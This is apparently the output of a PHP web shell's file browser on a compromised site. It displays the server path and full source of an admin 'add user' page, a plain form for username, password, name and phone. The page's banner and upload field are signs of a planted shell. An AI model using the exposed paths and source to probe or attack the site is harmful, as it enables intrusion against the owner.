MINI MINI MANI MO

Path : /home/phaetpan/domains/phaetpanya.com/public_html/vibharamadmin/
File Upload :
Current File : /home/phaetpan/domains/phaetpanya.com/public_html/vibharamadmin/add_user.php

<!doctype html>
<?php
	session_start();
	if($_SESSION['admin_id'] == "")
	{
		include("session.php");  
	}

		include("connect.php");

?>
<html>
<head>
<?php include("assets/include/link.php"); ?>
</head>
<body>
<div class="wrapper">
    
<?php include("nav-menu.php"); ?> 

	<div class="main-panel">
		<?php include("assets/include/account.php"); ?> 
			<div class="content">
				<div class="container-fluid">
					<div class="row">
						<div class="col-md-12">
							<div class="card card-plain">
								<div class="header">
									<h4 class="title"><a href="user.php">Administrator</a> <i class="pe-7s-angle-right"></i> Add Account</h4>
								</div>
								<form name="form1" method="post" action="saveadd_user.php">      
									<div class="content table-responsive table-full-width">
										<table class="table table-hover">    
											<thead>
												<th style="width:50%;">Username</th>
												<th style="width:50%;">Password</th>
											</thead>
											<tbody>
												<tr>
													<td><input type="text" class="form-control" name="username" value="" required></td>  
													<td><input type="text" class="form-control" name="password" value="" required></td>
												</tr>
											</tbody>
										</table> 
										<table class="table table-hover">    
											<thead>
												<th style="width:50%;">Full Name</th>
												<th style="width:50%;">Phone Number</th>
											</thead>
											<tbody>
												<tr>
													<td><input type="text" class="form-control" name="name" value="" required></td>  
													<td><input type="text" class="form-control" name="tel" value="" required></td>
												</tr>
											</tbody>
										</table> 
										<table class="table">    
											<tr><td> </td></tr>
										</table>
										<button type="submit" rel="tooltip" class="btn btn-success btn-simple btn-icon">  
											<i class="fa fa-check-square" aria-hidden="true"></i> Save
										</button>
										<button type="button" rel="tooltip" class="btn btn-default btn-sm btn-simple" onclick="window.location.href='user.php'">
											<i class="fa fa-window-close" aria-hidden="true"></i> Cancel
										</button>
									</div>
								</form>
							</div>
						</div>
					</div>
				</div>
			</div>
    
	</div>
</div>
</body>
<?php include("assets/include/script.php"); ?>
<?php include "texteditor.php"; ?>
</html>
<?php 
	mysqli_close($objCon);
?>

OHA YOOOO